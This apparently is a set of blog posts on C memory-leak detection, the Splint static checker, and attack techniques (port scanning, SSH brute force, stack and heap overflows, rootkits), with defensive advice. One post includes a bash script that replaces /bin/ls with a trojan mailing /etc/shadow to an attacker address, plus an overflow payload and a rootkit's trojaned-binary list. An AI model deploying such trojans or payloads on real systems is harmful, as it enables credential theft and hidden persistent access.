Memory leak detector

1 12 2010

When you are writing a program that must run for a long period of time, or when some procedure is called x times during the lifetime of the running program (let x tend to infinity), it is a good opportunity to make sure all your malloc calls have a matching free call (new/delete in C++). This sounds very natural to any experienced programmer.

Now imagine that you have downloaded some huge chunk of code and you want to call it x times, let's say 100 times per second. Maybe the person who wrote the code did not think about memory management, and maybe you do not have the patience to read the huge piece of code. What you need is a memory leak detector.

If you do not have any of these problems, you might instead be interested in knowing how to gain millions of euros on the internet.

Here I will show an example of how to write a simple memory leak detector in C++ for C (malloc/free); it is trivial to adapt it to verify memory leaks in C++.

The main idea is to keep the line number of each malloc we do and then verify whether we called free on it. We will accomplish this by redefining the malloc and free calls, without the need to write our own malloc or free, thanks to the C preprocessor.

First we define an entity; it keeps all the information we need about each malloc call.

#include <cstdlib>
#include <iostream>
#include <list>

class Entity {
private:
	unsigned int _address; // address returned by malloc
	unsigned int _line;    // line number of the malloc call
public:
	Entity(unsigned int addr, unsigned int line) {
		this->_address = addr;
		this->_line = line;
	}
	unsigned int getAddress() {
		return this->_address;
	}
	unsigned int getLine() {
		return this->_line;
	}
};

typedef std::list<Entity *> Memory;
Memory *memory;

I used the standard C++ std::list instead of std::vector because I will need to add and remove elements, and I want to do it without calling find from the algorithm module, which bugs me.

Now I will define the function that adds elements to our std::list:

void InsertOnMalloc(unsigned int addr, unsigned int n) {
	if(!memory)
		memory = new Memory;

	memory->insert(memory->begin(), new Entity(addr,n));
}

Now I will define the function that removes elements from our std::list:

void RemoveOnFree(unsigned int addr) {
	if(!memory)
		return;
	for(Memory::iterator it = memory->begin(); it != memory->end(); it++)
	{
		Entity *entity = *it;
		if(entity->getAddress() == addr) {
			memory->erase(it);
			delete entity;
			break;
		}
	}
}

The idea so far is to call InsertOnMalloc for each malloc call and RemoveOnFree for each free call. After this, if we still have any element in our memory list, we print it out to see which lines were never freed.

void ShowLeaks() {
	if(!memory)
		return;
	for(Memory::iterator it = memory->begin(); it != memory->end(); it++)
		std::cout << "Missing free for the malloc at line: " << (*it)->getLine() << std::endl;
}

Now let's get to the real juice of this leak detector: here I will redefine the malloc call to be a regular malloc followed by an insertion, and the free call to be a regular free followed by a removal from our memory list.

#define malloc(p) mallocz((p),__LINE__)
#define free(p) freez((p))

static inline void *mallocz(unsigned int size, int line) {
	#undef malloc
	void *ptr = (void *)malloc(size);
	#define malloc(p) mallocz((p),__LINE__)
	InsertOnMalloc((unsigned int)ptr, line);
	return ptr;
}
static inline void freez(void *p) {
	RemoveOnFree((unsigned int)p);
	#undef free
	free(p);
	#define free(p) freez((p))
}

Now, if you want to use this "library" in your code, you save it to a file filename.h, include it in your code, and call ShowLeaks() to show which mallocs you forgot to free.
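Here is a minimal usage sketch, assuming the code above was saved as filename.h (compile it as C++, since the detector itself uses std::list):

#include "filename.h"

int main() {
	int *a = (int *)malloc(10 * sizeof(int)); /* freed below */
	char *b = (char *)malloc(64);             /* never freed: will be reported */

	free(a);

	ShowLeaks(); /* prints the line number of the malloc for b */
	return 0;
}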





Splint the static C code checker

3 05 2009

Splint is a great tool to statically analyze C code. Splint is an evolution of Lint. Lint analyzes C code and detects unused declarations, type inconsistencies, use before definition, unreachable code, ignored return values, execution paths with no return and infinite loops. However, Lint was not a sufficiently powerful tool. Splint was created as a descendant of Lint that allows annotations in C code, so it does more checks than its predecessor. In this post I will present some of the verifications that Splint does, and show its philosophy and how to use it. Splint allows annotations on functions, variables, parameters and types.

Undefined Variables

Splint detects instances where the value of a variable is used before it is defined. Many static analyzers can also do this; it is a very basic check. However, thanks to Splint's annotation support, annotations can be used to describe what storage must be defined and what storage may be undefined at interface points; this means Splint can check that all storage reachable from a global variable, a parameter to a function, or a function return value is defined before and after the function call.

A special case of undefined variables is undefined function parameters. Sometimes we write a C function that returns values through its parameters. The out annotation denotes a pointer to storage that may be undefined. Splint has a good storage model, so it does not report an error when a pointer to allocated but undefined storage is passed as an out parameter. If, in the body of a function, an out parameter is allocated but never bound to a value, Splint reports an error. You can see out as a parameter that will be defined inside the function. The opposite happens with the in annotation, which denotes a parameter that must be completely defined when the function is called.
Here is a small example of it:

extern void setVal (/*@out@*/ int *x);
extern int getVal (/*@in@*/ int *x);
extern int mysteryVal(int *x);

int dumbfunc(/*@out@*/ int *x, int i) {
    if (i > 3)
11         return *x;
    else if (i > 1)
13         return getVal (x);
    else if (i == 0)
15         return mysteryVal (x);
    else {
18         setVal (x);
19         return *x;
    }
}

And here it is the output of Splint:

> splint usedef.c
usedef.c:11: Value *x used before definition
usedef.c:13: Passed storage x not completely defined
    (*x is undefined): getVal (x)
usedef.c:15: Passed storage x not completely defined
    (*x is undefined): mysteryVal (x)
Finished checking --- 3 code warnings

As you can see, no error is reported for lines 18 and 19, because the incompletely defined storage x is passed to a function (setVal, annotated with out) that will define it, so we can return *x with no problems.

Types

Strong type checking often reveals programming errors. Splint can check primitive C types more strictly and flexibly than typical compilers.

C does little type verification: for C, all basic non-numerical types (enum, pointer, char) are in the end just ints. Splint supports stricter checking of built-in C types. The char and enum types can be checked as distinct types, and the different numeric types can be type-checked strictly. If char is used as a distinct type, common errors involving assigning ints to chars are detected.

In Splint, you can always turn off some of the default verifications, and Splint will assume the C compiler strategy to verify the code. If you run Splint with the +charint flag, char types are indistinguishable from ints, so you can cast from int to char or from char to int. But never forget that this can lead to errors: as you can imagine, if you do (char) 1000 you will not get the expected result, because a char can only hold 256 distinct values.

Splint reports errors in the use of enums if a value that is not an enumerator member is assigned to the enum type, or if an enum type is used as an operand of an arithmetic operator. Anyway, you can turn this off by activating the enumint flag, and then you can use enum and int types interchangeably.
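Here is a small sketch of the kind of code these stricter checks complain about; the function and type names are made up for illustration:

enum color { RED, GREEN, BLUE };

int strict_types(void) {
    enum color c = RED;
    char ch = 'a';
    int i;

    i = ch;     /* flagged when char is checked as a distinct type */
    c = c + 1;  /* enum used as an operand of an arithmetic operator */
    return i + (int) c;
}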

Memory Management

About half the bugs in typical C programs can be attributed to memory management problems.

Any C programmer who has written a reasonably sized program has been confronted with unexpected errors related to memory management. This happens basically because C is a low-level language and has nothing like Java's garbage collector: all memory management has to be done by the programmer, so errors may happen. Some appear only sporadically, and some may only show up when the program is compiled on a different platform. Splint is able to detect many memory management errors at compile time, like: using storage that may have been deallocated, memory leaks, or returning a pointer to stack-allocated storage. This is possible because Splint builds a memory model while it works on the code, but I will not go into that subject here.

Splint can detect and report deallocating storage when there are other live references to the same storage, and failing to deallocate storage before the last reference to it is lost. The solution here is simple: Splint creates an obligation to release storage and attaches this obligation to the reference to which the storage is assigned.

For references that are not shared, Splint uses the only annotation to indicate that a reference is the only pointer to the object it points to; here we also use the null annotation to say that the output of malloc could be NULL:

/*@only@*/ /*@null@*/ void *malloc (size_t size);

Here is a simple example of annotated C code with memory leaks and use-after-free variables:

1 extern /*@only@*/ int *glob;
/*@only@*/ int *f (/*@only@*/ int *x, int *y, int *z) /*@globals glob;@*/ {
8    int *m = (int *)
9    malloc (sizeof (int));
11   glob = y;   //Memory leak
12   free (x);
13   *m = *x;   //Use after free
14    return z;   //Memory leak detected
}

Here is the Splint output for the file above:

> splint only.c
only.c:11: Only storage glob (type int *) not released before assignment: glob = y
only.c:1: Storage glob becomes only
only.c:11: Implicitly temp storage y assigned to only: glob = y
only.c:13: Dereference of possibly null pointer m: *m
only.c:8: Storage m may become null
only.c:13: Variable x used after being released
only.c:12: Storage x released
only.c:14: Implicitly temp storage z returned as only: z
only.c:14: Fresh storage m not released before return
only.c:9: Fresh storage m allocated

Splint errors and warnings are very human readable, so you just have to read them to understand.
The first warning says that the storage glob was not released before the assignment (we said, in line 1, that it is only). In line 13 we have a dereference of the possibly null pointer m, because the malloc in line 8 may have returned NULL and we never checked it; line 13 also uses x after it was released by the free in line 12. As you can see, it is very easy to understand the output of Splint.

Splint can also verify stack-based references. A memory error occurs if a pointer into the stack is still live after the function returns. Splint detects errors involving stack references exported from a function through return values, or through assignments to references reachable from global variables or actual parameters.
No annotations are needed to detect stack reference errors: it is clear from the declarations whether storage is allocated on the function stack.

Here is an example of stack-allocated storage:

int *glob;

int *f (int **x) {
    int sa[2] = { 0, 1 };
    int loc = 3;
9   glob = &loc;
10  *x = &sa[0];
12  return &loc;
}

And here is the Splint output:

> splint stack.c
stack.c:12: Stack-allocated storage &loc reachable from return value: &loc
stack.c:12: Stack-allocated storage *x reachable from parameter x
stack.c:10: Storage *x becomes stack
stack.c:12: Stack-allocated storage glob reachable from global glob
stack.c:9: Storage glob becomes stack

Control Flow

In order to avoid certain errors, Splint has to understand the control flow of the program, so it does some checks related to control flow. Many of these checks are only possible because of the extra information provided by annotations. Without this additional information, Splint assumes that all functions return and that execution continues normally.

The noreturn annotation is used to denote a function that never returns:

extern /*@noreturn@*/ void fatalerror (char *s);

We also have the maynoreturn and alwaysreturns annotations, but Splint must assume that a function returns normally when checking the code, and it does not verify whether the function really returns.

To describe non-returning functions there are also the noreturnwhentrue and noreturnwhenfalse annotations, which mean that a function never returns if its first argument is true (or false, respectively):

/*@noreturnwhenfalse@*/ void assert (/*@sef@*/ bool /*@alt int@*/ pred);

The sef annotation denotes a parameter that must be side-effect free, and alt int indicates that it may be either a boolean or an integer.

Undefined Behavior

The order in which side effects take place in C is not entirely defined by the code.

A sequence point is a point in the C code where it is guaranteed that all side effects of previous evaluations have been performed.
Examples of sequence points are:

  • a function call (after the arguments have been evaluated)
  • the end of an if, while, for or do statement
  • the operators &&, || and ?:

Here is a simple C program that has undefined behavior:

extern int glob;
extern int mystery (void);
extern int modglob (void) /*@globals glob@*/ /*@modifies glob@*/;

int f (int x, int y[]) {
11    int i = x++ * x;
13    y[i] = i++;
14    i += modglob() * glob;
15    i += mystery() * glob;
16    return i;
}

And here is the Splint output:

> splint order.c
order.c:11: Expression has undefined behavior (value of right operand modified by left operand): x++ * x
order.c:13: Expression has undefined behavior (left operand uses i, modified by right operand): y[i] = i++
order.c:14: Expression has undefined behavior (value of right operand modified by left operand): modglob() * glob
order.c:15: Expression has undefined behavior (unconstrained function mystery used in left operand may set global variable glob used in right operand): mystery() * glob

Regarding control flow, Splint has more options to check C code; I will not cover all of them here.

Buffer Sizes

Buffer overflow errors are a particularly dangerous type of bug in C; they are responsible for half of all security attacks. This happens because C does not perform runtime bounds checking (for performance reasons), so attackers can exploit program bugs to, for example, gain full access to a machine.

Splint models blocks of memory using two properties.
maxSet: maxSet(b) denotes the highest index of b that can safely be used as an lvalue; for instance, for

char buffer[MAXSIZE] we have maxSet(buffer) = MAXSIZE - 1

and maxRead: maxRead(b) denotes the highest index of a buffer that can safely be used as an rvalue.

When a buffer is accessed as an lvalue, Splint generates a precondition constraint involving the maxSet property; when a buffer is accessed as an rvalue, it generates a precondition constraint involving the maxRead property.

We can use these two properties in buffer size annotations; these annotations use requires and ensures clauses, just like JML, VDM and Frama-C. When a function with a requires clause is called, the call site must be checked to satisfy the constraints implied by the requires clause.

Here is an example of its use:

void /*@alt char * @*/ strcpy
(/*@out@*/ /*@returned@*/ char *s1, char *s2)
/*@modifies *s1@*/
/*@requires maxSet(s1) >= maxRead(s2)@*/
/*@ensures maxRead(s1) == maxRead(s2)@*/;

This is a possible annotation for the strcpy standard C library function. We say that s1 is the return value of the function (returned) and that it will be defined inside the function (out). We also say that this function modifies *s1, and we specify the pre and postconditions.

Splint can also do bounds checking. This is more complex than the other checks done by Splint, so memory bound warnings contain extensive information about the unresolved constraint, as you can see in this example:

int buf[10];
buf[10] = 3;

setChar.c:5:4: Likely out-of-bounds store: buf[10]
    Unable to resolve constraint: requires 9 >= 10
    needed to satisfy precondition: requires maxSet(buf @ setChar.c:5:4) >= 10

The ultimate test: wu-ftpd

wu-ftpd version 2.5.0 was about 20,000 lines of code, and it took less than four seconds to check all of wu-ftpd on a 1.2-GHz Athlon machine. Splint detected the known flaws as well as finding some previously unknown ones (!)

One of the problems of these automatic static analysis tools is that they can report false positives.
Running Splint on wu-ftpd without adding annotations produced 166 warnings for potential out-of-bounds writes. After adding 66 annotations, it produced 101 warnings: 25 of these indicated real problems and 76 were false positives.

Pros and Cons

Pros:

  • Lightweight static analysis detects software vulnerabilities
  • Splint definitely improves code quality
  • Suitable for real programs…

Cons:

  • …although it produces many warning messages, which can lead to confusion
  • It won’t eliminate all security risks
  • Hasn’t been developed since 2007, they need new volunteers

Conclusions

No tool will eliminate all security risks, but lightweight static analysis tools like Splint play an important role in identifying security vulnerabilities.


Outroduction

All the examples provided here are from the Splint manual.





Tracing the attack – Part II

22 01 2009

Intro

This post is the continuation of Tracing the attack – Part I, and it is the final one of this stack.
Here I'm going to talk about Heap/BSS overflows and rootkits.

Heap

On the Stack, memory is allocated by the kernel (as explained in Part I). The Heap, on the other hand, is a structure where the program can dynamically allocate memory, with the malloc(), realloc() and calloc() functions.

BSS segment

BSS stands for Block Started by Symbol and is used by compilers to store static variables. These variables are filled with zero-valued data at the start of the program. In the C programming language, all static variables that are declared but not initialized are placed in the BSS segment.
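For instance, here is a minimal sketch of which variables end up in which segment (the variable names are made up):

static int counter;       /* static and uninitialized: placed in the BSS, zero-filled */
static int limit = 100;   /* static but initialized: placed in the data segment instead */
int hits;                 /* uninitialized global: also ends up in the BSS */

int main(void) { return counter + limit + hits; }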

Heap/BSS Overflow

As a simple example, extracted from the w00w00 article, here is a demonstration of a heap overflow:

   /* demonstrates dynamic overflow in heap (initialized data) */
   #include <stdio.h>
   #include <stdlib.h>
   #include <string.h>
   #include <sys/types.h>

   #define BUFSIZE 16
   #define OVERSIZE 8 /* default: overflow buf2 by OVERSIZE bytes */

   int main(int argc, char **argv)
   {
      u_long diff, oversize = (argc > 1) ? (u_long)atoi(argv[1]) : OVERSIZE;
      char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char *)malloc(BUFSIZE);

      diff = (u_long)buf2 - (u_long)buf1;
      printf("buf1 = %p, buf2 = %p, diff = 0x%lx bytes\n", buf1, buf2, diff);

      memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = '\0';

      printf("before overflow: buf2 = %s\n", buf2);
      memset(buf1, 'B', (u_int)(diff + oversize));
      printf("after overflow: buf2 = %s\n", buf2);

      return 0;
   }

Now, when we compile this code as heap1 and execute it with parameter 8 (the number of bytes to overflow):

   [root /w00w00/heap/examples/basic]# ./heap1 8
   buf1 = 0x804e000, buf2 = 0x804eff0, diff = 0xff0 bytes
   before overflow: buf2 = AAAAAAAAAAAAAAA
   after overflow: buf2 = BBBBBBBBAAAAAAA

This works because buf1 overruns its boundary and writes data into buf2's heap space. The program doesn't crash because buf2's heap space is still a valid segment.

To see a BSS overflow we just have to replace
char *buf = malloc(BUFSIZE) with static char buf[BUFSIZE].
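Here is a minimal sketch of that variant, keeping the sizes from the example above (whether buf2 is actually reached depends on how the compiler lays out the BSS):

#include <stdio.h>
#include <string.h>

#define BUFSIZE 16
#define OVERSIZE 8

/* uninitialized static buffers live in the BSS segment */
static char buf1[BUFSIZE];
static char buf2[BUFSIZE];

int main(void)
{
   memset(buf2, 'A', BUFSIZE-1); buf2[BUFSIZE-1] = '\0';

   printf("before overflow: buf2 = %s\n", buf2);
   /* overrun buf1 past its boundary, into buf2's BSS space */
   memset(buf1, 'B', BUFSIZE + OVERSIZE);
   printf("after overflow: buf2 = %s\n", buf2);

   return 0;
}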

If the heap is non-executable, that will prevent jumping to code placed there. But even so, it won't prevent heap overflows.

I won't talk any more about this subject in this post; if you want to learn more, you can read the w00w00 article, and some more from the references section (at the end of this post).

Rootkits

After gaining access to the target machine (using an exploit, for example), the attacker must ensure he will continue to have access even after the victim has fixed the vulnerability, and without the victim knowing that the system remains compromised. The attacker can achieve this through the installation of a rootkit on the target machine.
A rootkit is basically a set of tools (backdoors and trojan horses) designed with the aim of providing absolute control of the target machine. A backdoor is a way of bypassing legitimate authentication on a machine, providing remote access to it while trying to remain undetected. It can take the form of a new program or of a change to a program already installed. A trojan horse (or just trojan) is usually a program that supposedly performs some function but actually also performs other, malicious functions without the knowledge of the victim.
Below is a very simple example of a bash script that creates a possible trojaned ls:

#!/bin/bash
mv /bin/ls /bin/ls.old
/bin/echo "cat /etc/shadow | mail attacker@domain.com" > /bin/ls
/bin/echo "/bin/ls.old" >> /bin/ls
chmod +x /bin/ls

Clearly we are not considering the fact that ls can receive arguments; this is just for example purposes, and it is good enough to show the objective of a trojan.

Usually a real trojan would install modified versions of several binaries (lsof, ps, etc.). The idea of changing these programs is to hide the trojan itself: with a changed ps command, the user cannot see the trojan process running.

Here is a list of the programs changed when you install Linux Rootkit 4:

bindshell	port/shell type daemon!
chfn		Trojaned! User > r00t
chsh		Trojaned! User > r00t
crontab		Trojaned! Hidden Crontab Entries
du		Trojaned! Hide files
find		Trojaned! Hide files
fix		File fixer!
ifconfig	Trojaned! Hide sniffing
inetd		Trojaned! Remote access
killall		Trojaned! Won't kill hidden processes
linsniffer	Packet sniffer!
login		Trojaned! Remote access
ls		Trojaned! Hide files
netstat		Trojaned! Hide connections
passwd		Trojaned! User > r00t
pidof		Trojaned! Hide processes
ps		Trojaned! Hide processes
rshd		Trojaned! Remote access
sniffchk	Program to check if sniffer is up and running
syslogd		Trojaned! Hide logs
tcpd		Trojaned! Hide connections, avoid denies
top		Trojaned! Hide processes
wted		wtmp/utmp editor!
z2		Zap2 utmp/wtmp/lastlog eraser!

There are many rootkits on the network; the most common ones compromise Windows and Unix systems.

Detecting and removing rootkits

When someone suspects that his system has been compromised, the best thing would be to use some tool to detect and remove rootkits. For Linux we have chkrootkit and rkhunter, and for Windows you can use RootkitRevealer.

As a curiosity, I would like to mention that in 2005 Sony BMG put a rootkit on several music CDs, which installed itself (without notice) on computers where the CDs were played.

Outroduction

As we saw, an attacker starts by using a scanner against a particular range of IPs, then checks whether there are services available, and then does a dictionary attack using the language of the victim's country, deduced from the IP. He could also detect vulnerabilities in the system that he could use to gain access. After having access to the computer, the attacker finishes by installing a rootkit to keep permanent access to the system.

As a bonus, I also explained some minimalistic examples of how someone who has access to a system can gain root access to it by exploiting programs that are running on that system.

This area is so vast that it is impossible to predict all the ways an attack can be done. Imagine that an attacker gains access to a computer but doesn't have root credentials: he will probably try to exploit some program that is running on that system…

References





Tracing the attack – Part I

21 01 2009

Intro

In this post I will talk about some of the techniques used to attack systems, and some solutions that can greatly reduce the number of attacks a system may suffer: a view of an attack, from scanning to gaining root on a system.
This work is a continuation of my work on honeypots. The attacks presented here could be seen on a high-interaction honeypot (real systems with known vulnerabilities). Unfortunately, in previous posts I used a low-interaction honeypot (emulation of vulnerabilities), so I could not identify some of the attacks mentioned here.
This post continues in Part II.

Starting

First let me talk about the profile of the principal threat we face from the moment we use the Internet: the script kiddie.
A script kiddie does not care who he is attacking; his only purpose is to gain root access on some machine. The problem is that he is helped by several tools that automate the whole process; usually the only thing he has to do is point the tool at the entire Internet.
Sooner or later he is guaranteed to get access to some machine.
Since these tools are becoming more widely known, and the searches are random, this threat is extremely dangerous: it is not a question of "if" but of "when" we will be the target of a scan.

I introduced the "who", now let me introduce the "how". Before starting any type of attack, the enemy must find out which machines are online and which of their ports (services) are open to the outside.
This technique is called port scanning.

Port Scanning

Port scanning is used both by system administrators and by attackers: the former to determine the level of security of their machines, the latter to find vulnerabilities, as I said before.
I will give special focus to this technique because mastering it is essential in both situations.

Basically, a port scan consists of sending a message to each port of a machine; depending on what kind of response we get, we determine the status of the port.

The possible port states are:

  • Open or Accepted: the machine sent a response indicating that a service is listening on that port
  • Closed, Denied or Not Listening: the machine sent a response indicating that any connection to that port will be denied
  • Filtered, Dropped or Blocked: there was no response from the machine

Just a note on the legality of this technique: a port scan can be seen as ringing a bell to confirm whether someone is home. Nobody can be accused of anything just for doing a port scan. But if we keep ringing the bell constantly, it could be claimed to be similar to a denial of service (for more about the legal issues related to port scanning).

Now we are ready to see the most popular techniques in Port Scanning.

TCP SYN scan

The SYN scan is the most popular because it can be done very quickly, scanning thousands of ports per second on a fast network without firewalls. This kind of scan is relatively discreet because it never completes TCP connections, and it allows a clear differentiation between port states with good confidence.
This technique is also known as half-open scanning, because it never opens a complete TCP connection. A SYN packet is sent (as the beginning of a normal complete connection) and we wait for an answer. If we receive a SYN/ACK, the port is Open; if we receive a RST, the port is Closed; and if there is no response after several retransmissions of the SYN, the port is marked as Filtered.
This last scenario also happens in the event of an ICMP Unreachable error.

Normal scenario (the client sends a SYN, the server replies with SYN/ACK, and the client sends an ACK):

TCP SYN attack (the client sends a SYN, the server replies with SYN/ACK, and the client does nothing):

TCP connect scan

This technique is used when the user does not have privileges to create raw packets (in nmap, for example, you must have root privileges for the SYN scan option). Rather than sending "custom" packets as in all the other techniques mentioned here, it establishes a complete TCP connection to each port of the target machine. This causes a considerable increase in time to obtain the same information as the previous technique (more packets are exchanged). In addition, most operating systems log these connections, so it is not a quick or silent scan; on Unix, for example, an entry is added to syslog.

UDP scan

A UDP scan is much slower than a TCP one, which is one of the reasons why many system administrators ignore the security of these ports; the attackers don't.
This technique consists of sending an empty UDP header (no data) to every target port. If an ICMP Unreachable error is returned, the port state (Closed or Filtered) is derived from the type and code of the error. If a UDP header is returned, the port is Open. If no response is received after the retransmissions of the header, the port is classified as Open|Filtered, because it may be in either state.

But, as I said, the greatest disadvantage of this technique is the time spent on the scan: Open and Filtered ports rarely respond, which can lead to several retransmissions (because it is assumed that the packet could have been lost). Closed ports are an even bigger problem: they normally respond with ICMP Unreachable errors, and many operating systems limit the frequency of ICMP packet transmission; Linux, for example, normally limits it to a maximum of one packet per second.

Faced with such constraints, scanning the full range of ports of a machine (65536 ports) would take more than 18 hours. Some optimizations involve scanning only the more common ports.

There are many other techniques used in port scanning (more information: here), but these ones show the behavior of this type of scan. It is easy to see why it is a critical step in an attacker's methodology. For correct identification of the target, a single technique may not be appropriate or sufficient.
So port scanning is not only about TCP SYN scans.
The tool I recommend for port scanning is Nmap, because it supports all the techniques I mentioned, and a lot more. This tool is being actively developed, and its author, Gordon "Fyodor" Lyon, is a guru in this area and largely responsible for its constant development.

For more information about Port scanning go to Nmap page explaining Port Scanning Techniques.
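As a quick illustration, here is how the scans described above map to Nmap options (the target host name is made up):

# TCP SYN (half-open) scan; needs root privileges
nmap -sS target.example.com

# TCP connect scan; works without root
nmap -sT target.example.com

# UDP scan of a few common UDP ports
nmap -sU -p 53,123,161 target.example.com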

Gain access to the machine

At this point the attacker already has a huge list of reachable machines and services. Now, to get remote access to a machine, in essence, we can use two techniques: brute force and password dictionaries (see the Infinite monkey theorem).

It may seem silly, but it is still heavily used against services such as SSH, as you can see in your /var/log/auth.log file…

Dec 24 01:24:46 kubos sshd[23906]: Invalid user oracle from 89.235.152.18
Dec 24 01:24:46 kubos sshd[23906]: pam_unix(ssh:auth): check pass; user unknown
Dec 24 01:24:46 kubos sshd[23906]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
Dec 24 01:24:48 kubos sshd[23906]: Failed password for invalid user oracle from 89.235.152.18 port 48785 ssh2
Dec 24 01:24:49 kubos sshd[23908]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!

Dec 24 01:26:01 kubos sshd[23963]: Invalid user test from 89.235.152.18
Dec 24 01:26:01 kubos sshd[23963]: pam_unix(ssh:auth): check pass; user unknown
Dec 24 01:26:01 kubos sshd[23963]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
Dec 24 01:26:04 kubos sshd[23963]: Failed password for invalid user test from 89.235.152.18 port 57886 ssh2
Dec 24 01:26:05 kubos sshd[23965]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!

Dec 24 01:26:21 kubos sshd[23975]: Invalid user cvsuser from 89.235.152.18
Dec 24 01:26:21 kubos sshd[23975]: pam_unix(ssh:auth): check pass; user unknown
Dec 24 01:26:21 kubos sshd[23975]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
Dec 24 01:26:22 kubos sshd[23975]: Failed password for invalid user cvsuser from 89.235.152.18 port 59883 ssh2
Dec 24 01:26:24 kubos sshd[23977]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!

And these are just some of the hundreds of attempts that were recorded.
I will now present some strategies for protection against these attacks:

Use strong passwords

This section may seem ridiculous, but the fact that this type of attack is still used demonstrates the lack of a culture of choosing good passwords.
Here are some requirements for a strong password these days:

  • A password should have a minimum of 8 characters
  • If the password can be found in a dictionary it is trivial, and not good. Attackers have large dictionaries of words in different languages (via the IP, for example, they can determine which dictionary to use)
  • Trivial variations of trivial passwords, such as "p4ssword", are almost as bad as "password" against a dictionary attack, but substantially better against a brute-force attack
  • The password should ideally be a combination of symbols, numbers, uppercase and lowercase
  • Mnemonics are easy to remember (even with special symbols) and make the best kind of passwords, such as "Whiskey-Cola is EUR 3 in Academic Bar!" = "W-CiE3iAB!" (this password is Very Strong according to The Password Meter)

The fact is, using strong passwords can prevent the attempts from succeeding, but it does not prevent the numerous attempts that are constantly made. In an extreme situation we might even be suffering denial of service attacks (which it is imperative to avoid on a machine whose purpose is to offer a service to the outside).

I have not yet mentioned that we can limit the number of connections established on port 22 (SSH) through iptables.

Using iptables to mitigate the attacks

We can limit access to a single source:

iptables -A INPUT -m state --state NEW -m tcp -p tcp -s 192.168.1.100 --dport 22 -j ACCEPT

The -s flag is used to indicate the source host IP.
We can also restrict access to some subnet, or some IP class, with this flag:

iptables -A INPUT -m state --state NEW -m tcp -p tcp -s 192.168.1.0/24 --dport 22 -j ACCEPT

If we want to access our machine from everywhere, we might want to limit our server to accept, for example, 2 connections per minute:

iptables -N SSH_CONNECTION
iptables -A INPUT -m state --state NEW -p tcp --dport 22 -j SSH_CONNECTION
iptables -A SSH_CONNECTION -m recent --set --name SSH
iptables -A SSH_CONNECTION -m recent --update --seconds 60 --hitcount 3 --name SSH -j DROP

Here we create a new chain called SSH_CONNECTION, which uses the recent module to allow at most two connection attempts per minute per IP.

RSA authentication

To avoid the use of passwords, we can use a pair of RSA keys, completely avoiding brute-force/dictionary attacks.
To do this we follow these steps:
Generate the key pair with the command:

ssh-keygen -t rsa

This command creates the files:
~/.ssh/id_rsa (private key) and ~/.ssh/id_rsa.pub (public key).
On each machine we want to connect to (target), append the generated id_rsa.pub to ~/.ssh/authorized_keys, for example like this:

cat id_rsa.pub >> ~/.ssh/authorized_keys

On each machine we want to connect from (home), put id_rsa in ~/.ssh/.
The only thing missing is to turn off password-based login, by adding the line "PasswordAuthentication no" to /etc/ssh/sshd_config and then restarting the sshd daemon with:

/etc/init.d/sshd restart

Exploitation of vulnerabilities

Now that we have reduced the chances of being attacked, let's see another way attackers use to gain access to a system.
Exploit is the name given to a piece of code used to exploit flaws in applications in order to cause behavior not anticipated by them. It is common, for example, to use one to gain control of a machine or to escalate privileges.
A widely used type of exploit is stack smashing, which occurs when a program writes to a memory address outside the space allocated for a data structure on the stack, usually a fixed-size buffer. Here is a very simple example of a local use of this exploit:

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
         char buffer[10];
         strcpy(buffer, argv[1]);
         printf(buffer);
         return 0;
}

When we compile and try to execute the above code, we get:

user@honeypot:~$ gcc exploit.c -o exploit
user@honeypot:~$ ./exploit thisisanexploit
*** stack smashing detected ***: ./exploit terminated
thisisanexploitAborted

As we can see, GCC has introduced mechanisms that block the execution of potentially malicious code. But this example is as simple as possible; more sophisticated attacks can get around these mechanisms.

The stack

When a function is called, the return address must be saved somewhere, and that somewhere is the stack. Saving the return address on the stack has one advantage: each task has its own stack, so each task has its own return addresses. Another advantage is that recursion is completely supported; if a function calls itself, a new return address is created for each recursive call, in each stack frame.
For example, the following code:

/** lengthOf  returns the length of list  l  */
public int lengthOf(Cell l) {
  int length;

  if ( l == null ) {
    length = 0;
  }
  else {
    length = 1 + lengthOf(l.getNext());
  }
  return length;
}

Will produce the following stacks:

The stack also contains local data storage: if a function declares local variables, they are stored there too. It may also contain the parameters passed to the function.

GCC and Stack canary’s

If you are wondering why a canary: the name is a reference to the canaries miners used to detect gas.
GCC and other compilers insert known values into the stack to monitor buffer overflows. If the stack buffer overflows, the first field to be corrupted will be the canary. The subroutines inserted into the program by GCC then verify the canary field, and if it has changed they abort with the message "*** stack smashing detected ***".

Stack corruption

If you are still wondering what a stack buffer overflow is good for, I give you a simple example (from the Wikipedia article).
Imagine you have the following code:

#include <string.h>

void foo (char *bar)
{
   char c[12];

   memcpy(c, bar, strlen(bar));  // no bounds checking...
}

int main (int argc, char **argv)
{
   foo(argv[1]);
   return 0;
}

As you can see, there is no verification of the input of the function foo, the *bar parameter.
This is the stack that is created at some point when this function is called by another one:

When you call foo, like this:

void function() {
  char *newBar = (char *)malloc(sizeof(char)*6);
  strcpy(newBar,"hello");
  foo(newBar);
}

This is what happens to the stack:

Now, if you try this:

void function() {
  char *newBar = (char *)malloc(sizeof(char)*24);
  strcpy(newBar, "AAAAAAAAAAAAAAAAAAAA\x08\x35\xC0\x80");
  foo(newBar);
}

This is what happens to the stack:

So now, when the foo function terminates, it will pop the return address and jump to that address (here 0x80C03508, the four injected bytes read little-endian), and not to the expected one. In this image, that address is the beginning of the char c[12] buffer, where the attacker previously placed shellcode, not the AAAAA string…
Now imagine that this program has the SUID bit set to run as root: you can instantly escalate to root…

Fortunately this kind of attack is becoming rarer since the introduction of stack canaries. This kind of protection is possible because the stack layout is not dynamic but, as we will see in Part II, the heap is.






Lex/yacc

31 07 2008

Intro

I have wanted to write about this for a long time. I finally have the time to write about parser generators.

